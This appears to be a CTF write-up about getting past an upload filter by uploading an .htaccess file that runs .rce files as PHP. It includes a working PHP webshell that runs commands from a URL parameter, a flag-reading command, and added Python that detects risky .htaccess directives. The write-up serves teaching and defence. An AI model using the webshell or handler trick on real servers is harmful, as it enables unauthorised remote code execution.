PHP-Apache-configuration | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.


Here we can’t upload .php files. However, we can upload a .htaccess file, which Apache applies as per-directory configuration, and that way do some nasty stuff.

This will be our .htaccess file:

# Enable indexing
Options +Indexes 

# Treat .rce as .php
AddType application/x-httpd-php .rce

# Enable php execution
php_flag engine on


Then, we’ll upload our webshell.rce file, which is:

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . system($_GET['cmd']) . "</pre>";
}
?>


And now, cat the password. This will be our payload: cat /var/www/html/private/flag.txt

Flag: ht@cc3ss2RCE4th%w1n
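From the defender's side, the upload filter in this challenge failed because it only blocked .php. The following is an added example, not code from the challenge or the original writeup: an allowlist filename check plus an audit of .htaccess content for the directives used above. The allowlist, rule names and function names are assumptions made for illustration.

```python
import os
import re

# Assumed allowlist for an upload feature; adjust to what the app really needs.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

# Directives that let a per-directory file change what Apache executes or exposes.
RISKY = [
    ("dir-listing", re.compile(r"^\s*Options\b.*(?<!-)\b(Indexes|ExecCGI)\b", re.I)),
    ("handler-remap", re.compile(
        r"^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*(php|cgi)", re.I)),
    ("php-engine", re.compile(r"^\s*php_(flag|value)\s+engine\s+(on|1|true)\b", re.I)),
]

# Constructed sample: the .htaccess content shown in this writeup.
SAMPLE = """# Enable indexing
Options +Indexes

# Treat .rce as .php
AddType application/x-httpd-php .rce

# Enable php execution
php_flag engine on
"""

def upload_allowed(filename):
    """Allowlist check: rejects dotfiles such as .htaccess and unknown extensions."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return False
    return os.path.splitext(name)[1].lower() in ALLOWED_EXT

def audit_htaccess(text):
    """Return (line number, rule, directive) for each risky directive found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # Apache comment line
        for rule, pattern in RISKY:
            if pattern.search(line):
                findings.append((lineno, rule, line.strip()))
    return findings

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE):
        print(finding)
    print(upload_allowed(".htaccess"), upload_allowed("webshell.rce"))
```

Setting AllowOverride None for the upload directory in the main server configuration makes Apache ignore an uploaded .htaccess entirely, which removes this path even if the filename filter is bypassed.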